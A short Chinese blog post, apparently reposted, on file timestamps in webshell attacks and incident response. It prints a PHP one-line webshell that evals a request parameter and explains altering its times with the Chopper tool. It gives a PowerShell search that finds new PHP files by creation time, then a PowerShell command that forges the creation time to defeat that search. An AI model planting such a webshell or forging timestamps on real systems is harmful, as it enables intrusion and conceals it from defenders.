内容简介:我们都知道每个文件都有三个时间属性,分别为针对这种情况,我们只需要对磁盘进行搜索,以创建时间为准倒序排列即可发现黑客上传的webshell。
前题
我们都知道每个文件都有三个时间属性,分别为 创建时间
, 上次修改时间
, 上次访问时间
。我们可以使用 powershell
命令查看文件的所有属性 (ls)[0]|fl *
命令解析:以列表的形式展示当前目录第一个文件的所有信息
渗透测试
shell.php
是一个一句话木马的 php 文件,代码如下 <?php eval($_REQUEST['test']);?>
,使用菜刀连接后右键可以 修改文件(夹)时间
,我们将时间修改为 2017
年 然后我们再来看一下该文件属性 发现菜刀只是修改了 上次修改时间
, 上次访问时间
, 创建时间
仍然是正确的。
应急响应
针对这种情况,我们只需要对磁盘进行搜索,以创建时间为准倒序排列即可发现黑客上传的webshell。 powershell
的命令为 Get-ChildItem -Recurse -Filter *.php G:\ | sort -Descending CreationTime | Select-Object FullName,Length,CreationTime,LastWriteTime | Select-Object -First 10
命令解析:查找G盘所有目录下最新创建的10个PHP文件,并展示出文件路径,大小,创建时间,上次修改时间
最后
为了真正修改文件时间,在使用菜刀修改文件时间后,还需要执行命令 powershell ((Get-ChildItem shell.php).CreationTime='2000/8/30 23:59:39')
实际渗透时创建时间应该略早于修改时间,或一致
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网
猜你喜欢:- 渗透技巧之Powershell实战技巧
- 渗透技巧——快捷方式文件的参数隐藏技巧
- express 框架一些渗透技巧
- 渗透测试中文件上传技巧
- 渗透测试之API测试技巧
- 域渗透技巧:MachineAccountQuota的利用
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。